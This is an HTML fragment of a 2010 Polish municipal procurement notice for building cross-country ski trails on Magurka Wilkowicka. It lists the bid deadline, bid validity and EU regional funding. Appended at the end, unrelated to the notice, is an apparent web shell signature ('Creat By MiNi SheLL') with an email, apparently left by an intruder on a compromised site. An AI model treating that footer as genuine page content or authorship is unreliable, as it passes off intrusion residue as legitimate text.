<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2010 godzina 13:00, miejsce: Urząd Gminy Wilkowice ul. Wyzwolenia 25 43-365 Wilkowice parter- Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane jest w ramach projektu pn. Budowa tras do narciarstwa biegowego w partiach szczytowych Magurki Wilkowickiej realizowanego w ramach projektu kluczowego Rozwój infrastruktury turystycznej Subregionu Południowego w ramach Priorytetu III. Turystyka, Poddziałanie 3.2.2. Infrastruktura około turystyczna / podmioty publiczne Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com